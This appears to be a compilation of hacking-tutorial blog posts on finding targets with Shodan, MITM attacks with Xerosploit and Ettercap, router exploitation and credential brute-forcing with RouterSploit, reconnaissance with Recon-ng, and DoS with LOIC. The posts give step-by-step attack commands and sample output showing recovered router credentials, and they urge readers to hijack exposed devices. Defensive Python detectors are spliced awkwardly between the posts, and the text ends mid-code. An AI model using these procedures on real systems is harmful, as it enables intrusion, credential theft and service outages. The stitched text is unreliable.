How To Use Shodan For Finding Targets, Information Gathering & Hacking ?


Ever wondered what hackers do when they don't find a target to pop into? Well, at least they don't waste their precious time searching for targets on Google; they search for targets on SHODAN.

The world is developing into a huge brain of interconnected devices, capable of responding to their surroundings and communicating with one another, which we generally call the "Internet"; this idea is part of the Internet of Things (IoT).

The search engine which hackers mostly use to search for targets has been called "The Scariest Search Engine on the Internet" by its creator John Matherly.


What is SHODAN

Some have described it as the search engine for hackers. Shodan is a search engine for finding specific devices, and device types, that exist online and are open on the Internet. The most popular searches are for things like webcam, Linksys, Cisco, Netgear, Proxy, etc.

Unlike Google, which crawls the Web looking for websites, Shodan navigates the Internet’s back channels. It’s a kind of “dark” Google, looking for the servers, webcams, printers, routers and all the other stuff that is connected to and makes up the Internet.

It works by scanning the Internet and parsing the banners that are returned by various devices. Using that information, Shodan can tell you things like what web server (and version) is most popular, or how many anonymous FTP servers exist in a particular location, and what make and model the device may be.
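As an added illustration (not Shodan's code, nor anything from this article's author), here is a small Python banner classifier that does what the paragraph describes: it reads the raw banner a service returns and derives product, version and exposure properties such as anonymous FTP or a Basic-auth admin page, so you can run it over banners grabbed from your own hosts and see what a banner-based search engine would learn about them. All addresses and banners in it are constructed, and the regexes are mine rather than Shodan's:

```python
"""Exposed-service inventory from service banners.

Added example, not Shodan's code: it mimics Shodan's approach of reading the
banner each service returns and deriving product, version and notable
properties (anonymous FTP, a Basic-auth admin page, cleartext telnet) so a
defender can check what their own hosts reveal. Every host, port and banner
below is constructed for the example.
"""
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple


@dataclass
class ServiceRecord:
    ip: str
    port: int
    product: Optional[str] = None
    version: Optional[str] = None
    flags: List[str] = field(default_factory=list)


# Constructed banners: (ip, port, raw response as read from the socket).
SAMPLE_BANNERS: List[Tuple[str, int, str]] = [
    ("203.0.113.10", 80, "HTTP/1.1 200 OK\r\nServer: Apache/2.4.29 (Ubuntu)\r\n\r\n"),
    ("203.0.113.11", 21, "220 (vsFTPd 3.0.3)\r\n230 Login successful.\r\n"),
    ("203.0.113.12", 22, "SSH-2.0-OpenSSH_7.4\r\n"),
    ("203.0.113.13", 80, "HTTP/1.1 401 Unauthorized\r\nServer: Boa/0.94.14rc21\r\n"
                         'WWW-Authenticate: Basic realm="Router Admin"\r\n\r\n'),
    ("203.0.113.14", 23, "\r\nWelcome to the router\r\nlogin: "),
]

SERVER_RE = re.compile(r"^Server:\s*([^/\s]+)(?:/(\S+))?", re.I | re.M)
REALM_RE = re.compile(r'^WWW-Authenticate:\s*Basic\s+realm="([^"]*)"', re.I | re.M)
FTP_RE = re.compile(r"^220[ -]\(?([A-Za-z][\w-]*)\s+v?([\d.]+)", re.M)
SSH_RE = re.compile(r"^SSH-[\d.]+-([A-Za-z]+)[_-]([\w.]+)", re.M)


def parse_banner(ip: str, port: int, banner: str) -> ServiceRecord:
    """Classify one banner the way a banner-based search engine would."""
    rec = ServiceRecord(ip, port)
    if banner.startswith("HTTP/"):
        m = SERVER_RE.search(banner)
        if m:
            rec.product, rec.version = m.group(1), m.group(2)
        realm = REALM_RE.search(banner)
        if realm:
            # A 401 with Basic auth on an embedded device is the classic
            # default-credential exposure; keep the realm for triage.
            rec.flags.append("http-basic-auth")
            rec.flags.append("realm=" + realm.group(1))
    elif banner.startswith("220"):
        m = FTP_RE.search(banner)
        if m:
            rec.product, rec.version = m.group(1), m.group(2)
        # A 230 in the probe transcript means the anonymous login succeeded.
        if re.search(r"^230[ -]", banner, re.M):
            rec.flags.append("anonymous-ftp")
    elif banner.startswith("SSH-"):
        m = SSH_RE.search(banner)
        if m:
            rec.product, rec.version = m.group(1), m.group(2)
    elif port == 23:
        rec.product = "telnet"
        rec.flags.append("cleartext-login")
    return rec


def inventory(banners: List[Tuple[str, int, str]]) -> List[ServiceRecord]:
    return [parse_banner(ip, port, raw) for ip, port, raw in banners]


def summarize(records: List[ServiceRecord]) -> Dict[str, object]:
    """Aggregate counts of the kind Shodan reports (top products, exposures)."""
    products = Counter(r.product for r in records if r.product)
    return {
        "products": products,
        "anonymous_ftp": sum("anonymous-ftp" in r.flags for r in records),
        "basic_auth_pages": sum("http-basic-auth" in r.flags for r in records),
        "cleartext_logins": sum("cleartext-login" in r.flags for r in records),
    }


if __name__ == "__main__":
    recs = inventory(SAMPLE_BANNERS)
    for r in recs:
        print(f"{r.ip}:{r.port:<3} {r.product or '?'} {r.version or ''} {' '.join(r.flags)}")
    print(summarize(recs))
```

Run it over a file of real banners from your own address space and the summary is the same kind of answer Shodan gives ("how many anonymous FTP servers", "which web server version is most common"), except that you get it before anyone else does.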


Getting SHODAN:

  1. Creating a user account

     Open up a browser and go to Shodan.io; you will be greeted with a welcome page. Navigate to Login/Register and fill in the details.

  2. Searching on Shodan

     After you register you can click on "Get Started" or search by typing.

 

Filters for search optimisation

  • city: Find devices in a particular city
  • country: Find devices in a particular country
  • geo: You can pass it coordinates
  • hostname: Find values that match the hostname
  • net: Search based on an IP or /x CIDR
  • os: Search based on an operating system
  • port: Find particular ports that are open
  • before/after: Find results within a timeframe
  • product: Find a particular product

Shodan reads the banners from IP addresses and then categorises all types of devices that have a remote interface, from all over the world. Many of these devices have default logins, so once you find a device with a default login you may be able to own it!

In addition, Shodan has some powerful features to search specifically for devices by type, login, port, and geography. I will show you some of these in my next Shodan tutorial, so keep coming back, my greenhorn hackers!

Shodan also provides a browser plugin, so that when you come across a host you want to know more about, you can simply click on the plugin to see the data Shodan already has on it.


Metasploit, one of the world's most used exploitation frameworks, also provides an auxiliary module for Shodan:

Metasploit module: auxiliary/gather/shodan_search

This module uses the Shodan API to search Shodan. An API key, obtained by registering at Shodan, is required to use this module. The output from the module is displayed on the screen, and you can save it to a file or to the MSF database. Shodan filters like port, hostname, os, geo and city can be used in queries, but you are limited by restrictions such as download and locate quotas, depending on the type of account (free/member) used to generate the API key.


msf > use auxiliary/gather/shodan_search
msf auxiliary(shodan_search) > show actions
...actions...
msf auxiliary(shodan_search) > set ACTION <action-name>
msf auxiliary(shodan_search) > show options
...show and set options...
msf auxiliary(shodan_search) > run

So keep hunting for open devices on the Internet using Shodan and make them slaves…

Kindly let us know if you have any queries, and do rate the article and share it to let others know about this tool for finding targets to hack. To know how to brute force a protocol, read the article How To Crack Passwords Using THC Hydra? Happy Hunting!

 

How Xerosploit Is Used For Hacking : Step-By-Step Guide


In this article you'll learn about Xerosploit, a tool used for man-in-the-middle attacks.

Networking is an important platform for an ethical hacker to check, since many threats can come from the internal network, like network sniffing, ARP spoofing, MITM, etc.

For those who are not familiar with the man-in-the-middle attack, welcome to the world of internal network attacks.

Man-In-The-Middle

The name itself reveals the attack pattern: the attacker gets in between the victim and its gateway (router) connection, sniffing (stealing) the network packets flowing from the victim to the gateway and vice versa.


 

This gives the hacker access to all the information the victim sends to the remote server.


 

There are many open source tools available online for this attack, like Ettercap, MITMf, Xerosploit, etc.

This article is on Xerosploit, which provides advanced MITM attacks on your local network to sniff packets, steal passwords, etc.

Its specific features are the following:

  • Port scanning
  • Network mapping
  • Dos attack
  • Html code injection
  • Javascript code injection
  • Download interception and replacement
  • Sniffing
  • Dns spoofing
  • Background audio reproduction
  • Images replacement
  • Driftnet
  • Web page defacement and more …

Installing Xerosploit:

Xerosploit is a MITM attack tool which runs only on Linux. To install it, follow these simple steps:

Open up a terminal and type:

  • git clone https://github.com/LionSec/xerosploit.git (downloads xerosploit)
  • cd xerosploit (change your working directory to the downloaded folder)
  • chmod +x install.py (give the file permission to be executed)
  • python install.py (run the installer)
  • select your OS (1. Kali/Ubuntu, 2. Parrot)

Wait for some time; the tool will update your system and install the required dependencies. After installation, run the command:

xerosploit

 

MITM using xerosploit

  1. Check your IP address, gateway and interface, which are shown at the start of the xerosploit interface.
  2. Now type in "help" to list the available commands. Here you can use:
     • Scan : Scan the network for available connected devices
     • Iface : Change your interface manually
     • Gateway : Set a gateway other than the one selected
     • Start : Target a known victim
     • Rmlog : Remove all the logs of xerosploit
  3. To continue the attack we scan the network first. Here we can see all the devices currently connected. Type in "help" to continue.
  4. We want to sniff all packets across the network, hence we type "all"; if you want to target a single victim, type in its IP, or if multiple, IP1, IP2, IP3…
  5. Again type in "help" to check the available commands, and then run any of the attack modules listed.
  6. Select the module and type in "run".

 

This tool is good for both beginners and experts, as its easy interface lets you inject HTML or JavaScript into the victim's network traffic, to redirect the victim to a malicious link or force them to download malicious content via JavaScript alert and download functions, and so get access to their system.

Besides this, Xerosploit can do a lot more things; hang on for the next article, till then Happy Hunting. If you want to know how to attack using SSLStrip, read the article How To Hack With Xerosploit? : Step-By-Step Guide.

Thank you.

How To Hack A Router With RouterSploit ?!


RouterSploit is a tool similar to Metasploit but designed for routers. In this modern age of smart devices, as their number grows, the need to check them for vulnerabilities is also expanding. Companies patch their products for security, which is known as a security update. Most Internet users only update their PC but forget about their router, which is their gateway to the Internet. Routers are the first devices exposed openly to the Internet, and they protect your devices from the darkness of the web using their firewall. Hence it has become necessary to update their firmware regularly.

This article on RouterSploit will make you an expert at finding vulnerabilities in your router, or any router.

So let’s get started,

About routersploit

The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices.

It consists of various modules that aid penetration testing operations:

exploits – modules that take advantage of identified vulnerabilities.

RouterSploit currently supports a limited number of exploits, but they can easily be extended from popular online exploit databases.

Creating Routersploit modules is very easy so that everyone can contribute to this excellent project.

The full process is described in RouterSploit Wiki.

In the wiki, you can find a code skeleton and all the necessary classes for module development.

The exploit stage in RouterSploit works pretty similar to Metasploit.

Anyone who has worked with Metasploit will feel at home with RouterSploit.

Picking the desired exploit, eased by command completion, leads to the exploit configuration section, after which we run the exploit.

RouterSploit also provides info about the exploits and a short description of each.

It is also possible to check whether the target is vulnerable to a particular exploit before you start the exploitation process.

creds – modules designed to test credentials against network services

This allows you to run a dictionary brute force attack against various network protocols like:

  • FTP
  • SSH
  • Telnet
  • HTTP basic auth
  • HTTP form auth

These modules come in two categories: ones that try default credentials and ones that use a custom dictionary.

scanners – modules that check if a target is vulnerable to any exploit

This allows you to check whether your selected target is vulnerable to any exploit module.

Installing Routersploit

 


git clone https://github.com/reverse-shell/routersploit
cd routersploit
./rsf.py

Scanner

rsf > use scanner/autopwn
rsf (AutoPwn) > show options
rsf (AutoPwn) > set target <IP>
rsf (AutoPwn) > run

This scanner scans the target with popular exploits and lists the exploits the target is vulnerable to.

Modules

To use a module, type:

rsf > use exploits/multi/misfortune_cookie
rsf (Misfortune Cookie) > show options

Target options:

   Name       Current Settings     Description
   ----       ----------------     -----------
   port       80                   Target port
   target                          Target address e.g. http://192.168.1.1

rsf (Misfortune Cookie) > set target 192.168.0.1
[+] {'target': '192.168.0.1'}
rsf (Misfortune Cookie) > check
[+] Target is vulnerable
rsf (Misfortune Cookie) >

 

Credentials (Brute Force)

This method can be used when the module

rsf > use creds/http_basic_bruteforce
rsf (HTTP Basic Bruteforce) > show options

Target options:

   Name       Current settings     Description
   ----       ----------------     -----------
   port       80                   Target port
   target                          Target IP address or file with target:port (file://)

Module options:

   Name       Current settings     Description
   ----       ----------------     -----------
   path       /                    URL Path
   usernames  admin                Username or file with usernames (file://)
   passwords  file:///usr/share/routersploit/routersploit/wordlists/passwords.txt   Password or file with passwords (file://)
   threads    8                    Number of threads
   verbosity  yes                  Display authentication attempts

rsf (HTTP Basic Bruteforce) > set target 192.168.0.2
[+] {'target': '192.168.0.2'}
rsf (HTTP Basic Bruteforce) > set passwords file:///usr/share/wordlists/nmap.lst
[+] {'passwords': 'file:///usr/share/wordlists/nmap.lst'}
rsf (HTTP Basic Bruteforce) > set verbosity no
[+] {'verbosity': 'no'}
rsf (HTTP Basic Bruteforce) > run
[*] Running module...
[*] Elapsed time:  1.97385120392 seconds
[+] Credentials found!

   Target          Port     Login     Password
   ------          ----     -----     --------
   192.168.0.2     80       admin     password

rsf (HTTP Basic Bruteforce) >

For SSH:

rsf > use creds/
creds/ftp_bruteforce         creds/http_basic_bruteforce  creds/http_form_bruteforce   creds/snmp_bruteforce
creds/ssh_default            creds/telnet_default         creds/ftp_default            creds/http_basic_default
creds/http_form_default      creds/ssh_bruteforce         creds/telnet_bruteforce

rsf > use creds/ssh_default
rsf (SSH Default Creds) > show options

Target options:

   Name       Current settings     Description
   ----       ----------------     -----------
   target                          Target IP address
   port       22                   Target port

Module options:

   Name       Current settings     Description
   ----       ----------------     -----------
   threads    8                    Number of threads
   defaults   file:///root/git/routersploit/routersploit/wordlists/defaults.txt   User:Pass or file with default credentials (file://)

rsf (SSH Default Creds) > set target 192.168.1.53
[+] {'target': '192.168.1.53'}
rsf (SSH Default Creds) > run
[*] Running module...
[*] worker-0 process is starting...
[*] worker-1 process is starting...
[*] worker-2 process is starting...
[*] worker-3 process is starting...
[*] worker-4 process is starting...
[*] worker-5 process is starting...
[*] worker-6 process is starting...
[*] worker-7 process is starting...
[-] worker-4 Authentication failed. Username: '3comcso' Password: 'RIP000'
[-] worker-1 Authentication failed. Username: '1234' Password: '1234'
[-] worker-0 Authentication failed. Username: '1111' Password: '1111'
[-] worker-7 Authentication failed. Username: 'ADVMAIL' Password: 'HP'
[-] worker-3 Authentication failed. Username: '266344' Password: '266344'
[-] worker-2 Authentication failed. Username: '1502' Password: '1502'
(..)
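The worker output above is the attacker's view of a default-credential run; the defender's view is a burst of failed logins in the router's sshd log. The following Python detector is an added example, not part of RouterSploit or of this article: it parses constructed syslog lines in OpenSSH's format, flags a source that exceeds a failure threshold within a time window (calling it a spray when the usernames vary, as a defaults list does), and escalates if an Accepted login follows from the same source. The log lines, addresses, threshold and window are all assumptions chosen for illustration:

```python
"""Detect credential brute-forcing in sshd logs.

Added example, not RouterSploit's code. A creds module like ssh_default produces
a burst of failed logins from one source, each with a different username, and on
success one "Accepted" line from the same source. This detector replays that
pattern from constructed syslog lines and flags a source that exceeds a failure
threshold inside a time window, escalating when a success follows the burst.
Hostnames, addresses and timestamps below are made up.
"""
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Optional, Tuple

LOG_RE = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2})\s+(?P<day>\d{1,2}) (?P<time>\d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+"
)

# Constructed sample log: a burst from .77 within a few seconds, then one
# success, and an unrelated single failure from .20 minutes later.
SAMPLE_LOG = """\
Mar  3 10:00:01 router sshd[1200]: Failed password for root from 192.168.1.77 port 50001 ssh2
Mar  3 10:00:01 router sshd[1201]: Failed password for invalid user 1234 from 192.168.1.77 port 50002 ssh2
Mar  3 10:00:02 router sshd[1202]: Failed password for invalid user 1111 from 192.168.1.77 port 50003 ssh2
Mar  3 10:00:02 router sshd[1203]: Failed password for invalid user 3comcso from 192.168.1.77 port 50004 ssh2
Mar  3 10:00:02 router sshd[1204]: Failed password for invalid user 266344 from 192.168.1.77 port 50005 ssh2
Mar  3 10:00:03 router sshd[1205]: Failed password for admin from 192.168.1.77 port 50006 ssh2
Mar  3 10:00:04 router sshd[1206]: Accepted password for admin from 192.168.1.77 port 50007 ssh2
Mar  3 10:05:00 router sshd[1300]: Failed password for alice from 192.168.1.20 port 51000 ssh2
"""


def parse(line: str, year: int = 2024) -> Optional[Tuple[float, str, str, str]]:
    """Return (epoch_seconds, result, user, source_ip) or None for other lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Syslog timestamps carry no year; the caller supplies it (assumed 2024 here).
    ts = datetime.strptime(f"{m['mon']} {m['day']} {m['time']} {year}", "%b %d %H:%M:%S %Y")
    return ts.timestamp(), m["result"], m["user"], m["src"]


def detect(log: str, threshold: int = 5, window: float = 60.0) -> List[Tuple[str, str, int]]:
    """Return (source_ip, verdict, failures_in_window) for each suspicious source."""
    failures: Dict[str, List[Tuple[float, str]]] = defaultdict(list)
    flagged: Dict[str, str] = {}
    counts: Dict[str, int] = {}
    for line in log.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        ts, result, user, src = rec
        if result == "Failed":
            # Keep only failures inside the sliding window for this source.
            hits = [(t, u) for t, u in failures[src] if ts - t <= window]
            hits.append((ts, user))
            failures[src] = hits
            counts[src] = len(hits)
            if len(hits) >= threshold and src not in flagged:
                distinct_users = {u for _, u in hits}
                # Many different usernames in the burst is the default-creds /
                # spray signature; the same user repeated is a plain brute force.
                flagged[src] = "password-spray" if len(distinct_users) >= threshold else "brute-force"
        elif result == "Accepted" and src in flagged:
            # A success after a flagged burst is the alert that needs a human now.
            flagged[src] = "success-after-" + flagged[src]
    return [(src, verdict, counts[src]) for src, verdict in flagged.items()]


if __name__ == "__main__":
    for src, verdict, n in detect(SAMPLE_LOG):
        print(f"{src}: {verdict} ({n} failures in window)")
```

Any router whose sshd log is forwarded to a collector can feed this; the threshold should sit well above what a fumbling administrator produces but below the rate a wordlist-driven module reaches in its first seconds.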

RouterSploit is a great tool for finding vulnerabilities in any router and exploiting them.

So find vulnerabilities and keep exploiting them, and to know how to hack any operating system using a shellcode generator that is mostly undetected by antivirus software, read the article How To Hack Into Android & Systems Using Venom?

Happy Hunting…

How To Use Recon-ng ? [Information Gathering Series]


This is the second article in the series on information gathering.

This time we will be discussing one of the most convenient and versatile information gathering tools out there, Recon-ng.

It was developed by Tim Tomes, and here is the download link: https://bitbucket.org/LaNMaSteR53/recon-ng.git.

You can clone it from the Bitbucket repository.

Recon-ng

It is an open source passive reconnaissance framework written in Python for Linux.

It is an all in one tool that acts as subdomain finder, contacts harvester, email harvester, geo location finder, vulnerability finder and a host of other things.

It has its own built in modules and it works by gathering information from different sources.

In order to utilize all the sources and modules we need API keys; some are expensive, some are free, and some modules don't require API keys at all.

We will discuss them later in the article.

Most people that use Recon-ng are on a Linux based platform, mostly Kali Linux, so we will go step by step through the process of installing Recon-ng and using it on Kali Linux.

First we will need to use git, which is preinstalled in Kali.

 

I had it already downloaded and installed, so I had to cancel it midway, but you will need to navigate into the folder where it is downloaded using the cd command and invoke the Python script with the command recon-ng.py.

The screenshot gives a glimpse of how it looks.

Now it is time for us.

Now we can use the help option to look at all the available commands.

Lets try that


 

In order to view all the modules we need to type in the command show modules, which displays all the modules available in the framework.

Lets try that

 

Recon-ng uses API keys (API is short for application programming interface) in order to interact with the concerned application and extract the required information.

To put it simply we are asking for permission from the respective organization to use the services of their applications.

This is done to prevent abuse of their service.

In order to display the available API keys we need to type in the command keys list.

This lists out the keys.

Lets try that

 

While I have not added any keys yet, the command to add keys is

keys add <the application name> <keys>


I just added a dummy 23456 key to show how the command works.

The process of finding the API keys is the most time consuming one.

We have to register ourselves with respective services and request for the key.

In order to keep things interesting we will skip that part and let you decide which API keys suit your needs.

Facebook, Google, Shodan, Twitter, Instagram, LinkedIn and Bing provide API keys for free.

Here is a useful link for finding the required API keys: https://raikia.com/recon-ng-api-key-creation/

OK, now we come to the reconnaissance part. First we need to create a workspace, which creates a separate database for each of our targets.

Each of these databases will contain all the information extracted about that target.

To list out the available workspaces we use the command workspaces list; to add a new workspace we use the command

workspaces add <target name>


 

 

Here we set hackeroyale as the name of the workspace.

Now we select the workspace with the command

workspaces select <name of the workspace>


Now let's try running a few modules against it.

First let's add the domain with the command


add domains <domain name>


 

Now let's start running modules against the target. First let's resolve the domain name with the command use resolve, which lists the available modules related to resolving the domain name.

 

This concludes the first part of the article.

The 2nd part will cover modules for different information extraction.

Till then, happy hunting.

 

How To DoS A Website With LOIC [Low Orbit Ion Cannon] ?


In this article you'll learn about a popular tool, the Low Orbit Ion Cannon.

Low Orbit Ion Cannon

Low Orbit Ion Cannon is a tool popular among script kiddies for attacking a server and bringing it down by performing a DoS or DDoS attack.

The world of information security is growing, leading to the development of code that carries vulnerabilities within it, causing loopholes in security.

But the most common issue to date for most web servers and online service providers is DDoS, one of the oldest and still evolving methods of the hacking world.

Denial Of Service

DoS, or Denial-of-Service, is one of the most popular attack methodologies, which hackers around the world use to hack into a network or bring a service down.

In this way, the server is not able to accept valid user requests, causing a denial of service to the user.

They are classified as DoS or DDoS attacks.

DoS refers to the attack type where an attacker attacks a target vulnerable to DoS from only a single IP; the target tries to reply to each of the packet requests it gets, and when the request flow exceeds its bandwidth or its accepting capacity, it fails to accept new connections and rejects them, causing a denial of service.

This can be prevented by modern firewalls by applying a rule that limits the number of connections allowed to a single IP or IP range.

Distributed DOS Attack

DDoS is a type of multiple DoS attack performed by an attacker using botnets, which he/she has built over time by sending malicious links or attachments and compromising Internet users' machines, webcams or smart devices.

Since the attacker has access to the botnets, they can be instructed to perform a DoS attack, causing multiple devices to DoS a single target which is patched only against DoS rather than DDoS.

In this case, the target receives requests from multiple IPs over the Internet, causing the DoS protection to break down.

This effectively makes it impossible to stop the attack simply by blocking a single IP; more than that, it is very difficult to distinguish legitimate users' data packets from attack packets.

This can also be done by a script which generates packets with different source IPs but a single destination IP.
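To make the contrast between the single-IP firewall rule above and a distributed flood concrete, here is an added Python example (not LOIC's code, nor any firewall product's): a per-source sliding-window limiter that caps new connections per address, replayed against two constructed floods, one from a single address and one from many addresses that each stay under the cap. The cap, the window and the addresses are assumptions chosen for illustration:

```python
"""Per-source connection limiting, and why it stops DoS but not DDoS.

Added example, not LOIC's code or any firewall's. The limiter implements the
single-IP rule the article describes (at most N new connections from one
source per window) with a sliding window per source address. Two constructed
floods are replayed through it: one from a single address, which the rule
caps, and one from many addresses each staying under the cap, which passes
untouched, illustrating why a distributed flood needs other defences.
"""
from collections import defaultdict, deque
from typing import Deque, Dict, List, Tuple


class PerSourceLimiter:
    def __init__(self, max_conns: int, window_s: float):
        self.max_conns = max_conns
        self.window_s = window_s
        self.recent: Dict[str, Deque[float]] = defaultdict(deque)

    def allow(self, src_ip: str, now: float) -> bool:
        """Admit the connection unless src_ip already used its quota in the window."""
        q = self.recent[src_ip]
        while q and now - q[0] >= self.window_s:   # expire entries older than the window
            q.popleft()
        if len(q) >= self.max_conns:
            return False
        q.append(now)
        return True


def replay(limiter: PerSourceLimiter, attempts: List[Tuple[float, str]]) -> Tuple[int, int]:
    """Return (allowed, blocked) for a list of (timestamp, source_ip) attempts."""
    allowed = sum(limiter.allow(ip, t) for t, ip in attempts)
    return allowed, len(attempts) - allowed


def single_source_flood(n: int = 200) -> List[Tuple[float, str]]:
    # Constructed: one address opening 200 connections in two seconds.
    return [(i * 0.01, "198.51.100.7") for i in range(n)]


def distributed_flood(hosts: int = 200, per_host: int = 5) -> List[Tuple[float, str]]:
    # Constructed: 200 bot addresses, each opening only 5 connections.
    return [((i * per_host + k) * 0.002, f"203.0.113.{i % 256}")
            for i in range(hosts) for k in range(per_host)]


def fresh_limiter() -> PerSourceLimiter:
    # Assumed policy: 20 new connections per source per 10-second window.
    return PerSourceLimiter(max_conns=20, window_s=10.0)


def demo() -> Dict[str, Tuple[int, int]]:
    """Replay both floods through identical limiters and report (allowed, blocked)."""
    return {
        "single": replay(fresh_limiter(), single_source_flood()),
        "distributed": replay(fresh_limiter(), distributed_flood()),
    }


if __name__ == "__main__":
    for name, (ok, dropped) in demo().items():
        print(f"{name:12} allowed={ok:5d} blocked={dropped:5d}")
```

The single-source flood is cut to the cap, while the distributed one delivers every connection because no one address is abnormal on its own; that is the situation the paragraphs above describe, where blocking a single IP no longer helps and the defence has to move to aggregate rate, traffic shape or upstream scrubbing.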

LOIC (Low Orbit Ion Cannon)

Low Orbit Ion Cannon is an open source network stress testing and Denial of Service attack tool, written in C#. LOIC was developed by Praetox Technologies but later was released into public domain hosting on several open platforms.

The tool is able to perform a simple DoS attack by sending a large sequence of UDP, TCP or HTTP requests to the target server.

It's a very easy tool to use, even for those lacking any basic knowledge of hacking.

The only thing a user needs to know for using the tool is the URL of the target.

Type of attacks

The tool opens multiple connections to the target server and sends a continuous sequence of messages which can be defined from the TCP/UDP message parameter option available on the tool.

In the TCP and UDP attacks, the string is sent as a plain text but in the HTTP attack, it is included in the contents of an HTTP GET message.

UDP Attack:

  • To perform the UDP attack, select the method of attack as UDP.
  • It has port 80 as the default option selected, but you can change this according to your need.
  • It is a connectionless protocol.

TCP Attack:

  • This method is similar to UDP attack.
  • Select the type of attack as TCP to use this. It is a connection based protocol.

HTTP Attack:

  • In this attack, the tool sends HTTP requests to the target server.
  • A web application firewall can detect this type of attack easily.

How to Perform DDoS using LOIC

  1. Downloading: You can download LOIC from any site found via a Google search and install it on any OS; it would be advantageous if you are using a Linux distribution (Kali Linux) and build it after downloading it from GitHub. Copy-paste the following command into a Linux terminal to download LOIC:

     git clone https://github.com/NewEraCracker/LOIC.git

  2. Run the tool and provide the IP or URL of the victim in the target section; it will be shown in the selected target box.
  3. Select your attack method in the attack options section.
  4. You can observe your attack status in the box provided under the selected target region.
  5. You can also set the speed of the attack with the slider. It is set to faster by default, but you can slow it down with the slider.

Here’s the meaning of each field:

  • IDLE: Shows the number of idle threads. It must be zero for higher efficiency of the attack.
  • Connecting: Shows the number of connections that are being attempted to the victim server.
  • Requesting: Shows the number of connections that are requesting some information from the victim server.
  • Downloading: Shows the number of connections that are initiating a download of some information from the server.
  • Downloaded: Shows how many times data has been downloaded from the victim server you are attacking.
  • Requested: Shows how many times a data download has been requested from the victim server.
  • Failed: Shows how many times the server did not respond to a request. A larger number of failures in this field indicates the server is going down. The success of the attack can be measured by the number shown in this field.

 

Drawbacks of using LOIC

This tool does not take any precautions to hide the IP address of the origin of the attack. Attacks generated by this tool are simple and expose the IP address of the attacker in each request packet sent to the victim server to flood its request queue. If you are thinking that proxies can solve this problem, you are wrong: attackers cannot use proxies in these attacks because the requests will hit the proxy server, not the target server, so you will not be able to launch a DoS attack on the server effectively while using a proxy. But some analysts say that it can be used with a proxy server if the proxy is robust enough; according to them, all your request packets will be forwarded to the server by the proxy in the end.

This is all about LOIC.

Hope to see you guys in the next article, till then Keep Hacking.

 

How To Sniff Passwords Using Ettercap ? [MITM Series : 5]


Welcome back to all my hackers and geeks.
In this article you are going to get the complete synopsis of Ettercap.

Ettercap

Ettercap is one of the most famous and widely used tools for performing man-in-the-middle attacks; for those who do not like the command line interface, ettercap-gtk provides a graphical interface for beginners.

While most users treat Ettercap only as a man-in-the-middle tool, it can also perform many other tasks, like DoSing a target, etc.

To access Ettercap in Kali Linux:

1. Click on Applications at the top of the menu bar.

2. Go to Sniffing & Spoofing, where you will find Ettercap.

3. Click on Sniff, select Unified sniffing and select the interface you want to sniff packets on.

UNIFIED: this method sniffs all the packets that pass on the cable.

Packets not directed to the host running ettercap will be forwarded automatically using layer 3 routing.

So you can use an MITM attack launched from a different tool and let ettercap modify the packets and forward them for you.

BRIDGED: it uses two network interfaces and forwards the traffic from one to the other while performing sniffing and content filtering.

This sniffing method is totally stealthy, since there is no way to find that someone is in the middle of the cable.

You can look at this method as an MITM attack at layer 1.

You will be in the middle of the cable between two entities.

Don’t use it on gateways or it will transform your gateway into a bridge.

4. Go to Plugins and Manage the plugins.

Here you will find all the plugins of ettercap preinstalled.

Below are descriptions of the plugins pre-installed in Ettercap:

1. arp_cop

It reports suspicious ARP activity by passively monitoring ARP requests.

It can report ARP poisoning attempts or simple IP-conflicts or IP-changes.

If you build the initial host list the plugin will run more accurately.
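As an added example covering both the man-in-the-middle attack described in the Xerosploit article above and what arp_cop does, here is a passive ARP monitor in Python; it is not Ettercap's or Xerosploit's code. It keeps an IP-to-MAC table from observed ARP replies, optionally seeded with a known host list as arp_cop's host list does, and reports a poisoning attempt (a known IP re-announced with a MAC that already belongs to another host, which is what gateway impersonation looks like on the wire), an IP conflict, and a plain IP change. All addresses and the capture are constructed:

```python
"""Passive ARP monitor, in the spirit of Ettercap's arp_cop plugin.

Added example, not Ettercap's or Xerosploit's code. It keeps an IP-to-MAC
table from observed ARP replies and raises the three conditions arp_cop
reports: a poisoning attempt (an IP suddenly claims a MAC that already
belongs to another host, which is exactly what a MITM tool does when it
impersonates the gateway), an IP conflict, and a plain IP change. Seeding
the table with known hosts, as arp_cop's host list does, makes the first
verdict accurate. All addresses and observations are constructed.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass(frozen=True)
class ArpReply:
    ts: float          # seconds since capture start
    sender_ip: str
    sender_mac: str


@dataclass(frozen=True)
class Alert:
    kind: str          # "arp-poisoning", "ip-conflict" or "ip-change"
    ip: str
    old_mac: Optional[str]
    new_mac: str
    ts: float


class ArpWatch:
    def __init__(self, known_hosts: Optional[Dict[str, str]] = None):
        self.table: Dict[str, str] = dict(known_hosts or {})
        self.alerts: List[Alert] = []

    def _owners(self, mac: str, exclude_ip: str) -> List[str]:
        """Other IPs currently bound to this MAC."""
        return [ip for ip, m in self.table.items() if m == mac and ip != exclude_ip]

    def observe(self, r: ArpReply) -> Optional[Alert]:
        prev = self.table.get(r.sender_ip)
        if prev == r.sender_mac:
            return None                                   # consistent, nothing to do
        alert = None
        if prev is None:
            if self._owners(r.sender_mac, r.sender_ip):
                # A MAC we already know is now also claiming a second IP.
                alert = Alert("ip-conflict", r.sender_ip, None, r.sender_mac, r.ts)
        elif self._owners(r.sender_mac, r.sender_ip):
            # Known IP re-bound to another host's MAC: the poisoning signature.
            alert = Alert("arp-poisoning", r.sender_ip, prev, r.sender_mac, r.ts)
        else:
            alert = Alert("ip-change", r.sender_ip, prev, r.sender_mac, r.ts)
        self.table[r.sender_ip] = r.sender_mac           # track the current binding
        if alert:
            self.alerts.append(alert)
        return alert


# Constructed capture: the gateway is pre-seeded, a laptop appears, then the
# gateway's IP is suddenly announced with the laptop's MAC.
GATEWAY = {"192.168.1.1": "aa:bb:cc:00:00:01"}
SAMPLE_REPLIES = [
    ArpReply(0.0, "192.168.1.20", "aa:bb:cc:00:00:20"),   # laptop joins, fine
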